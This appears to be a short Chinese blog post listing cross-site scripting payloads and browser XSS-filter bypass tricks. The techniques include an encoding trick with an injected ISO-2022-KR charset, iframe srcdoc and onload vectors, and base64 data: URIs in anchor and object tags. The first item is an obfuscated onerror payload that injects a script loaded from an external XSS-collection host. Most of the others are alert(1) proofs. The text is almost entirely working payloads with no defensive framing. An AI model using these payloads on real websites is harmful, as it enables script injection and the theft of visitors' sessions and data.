1、http://www.wooyun.org/bugs/wooyun-2013-034003
<textarea/>"><img src=1 οnerrοr="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'"> <textarea/><iframe src=http://www.baidu.com/></iframe>
2、只有数据包中http头含有X-XSS-Protection并且值为0的时候,浏览器才不会开启xss filter。
3、可以利用字符编码来绕过XSS Filter的方法,当编码是is-2022-kr时浏览器会忽略%0f,这样我们在onerror后面加个%0f就能绕过filter,前提是注入一个<meta charset=ISO-2022-KR>
4、<iframe srcdoc='<script>alert(1)</script>'>
不是以on开头的 又可以执行JS的iframe属性。
5、<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=>aa</a>
6、<a href=javascirpt:alert(1)>请点击</a>
7、<iframe/onload=alert(1)>
8、
1 | <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="></object> |
扫一扫
2052
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
